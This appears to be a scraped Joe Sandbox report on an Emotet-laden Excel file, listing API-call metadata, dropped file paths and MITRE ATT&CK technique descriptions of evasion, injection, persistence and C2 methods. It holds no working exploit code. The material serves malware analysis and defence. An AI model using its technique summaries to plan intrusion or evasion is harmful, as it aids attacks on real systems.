Associated: 0000000B.00000002.549922432.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.549994202.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550011381.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550025372.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550052939.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92

Uniqueness

Uniqueness Score: -1.00%

Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B

Memory Dump Source

Source File: 0000000B.00000002.549940138.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.549922432.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.549994202.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550011381.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550025372.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550052939.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15

Uniqueness

Uniqueness Score: -1.00%

Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC

Memory Dump Source

Source File: 0000000B.00000002.549940138.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.549922432.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.549994202.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550011381.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550025372.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.550052939.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1162545482187818.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary

Jbx Signature Overview

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\JooSee.dll

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

C:\Users\user\AppData\Local\Temp\473D.tmp

C:\Users\user\AppData\Local\Temp\~DF36C327800F732AC5.TMP

C:\Users\user\AppData\Local\Temp\~DF3E467E9CE6D414C1.TMP

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms.. (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AGKJQE95H0UNWDLV1KB1.temp

C:\Users\user\Desktop\1162545482187818.xls

C:\Windows\SysWOW64\Yjtipscuxmuubs\fpasqaepcht.dgb (copy)

Static File Info

General

File Icon

Static OLE Info

Windows Analysis Report
1162545482187818.xls

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre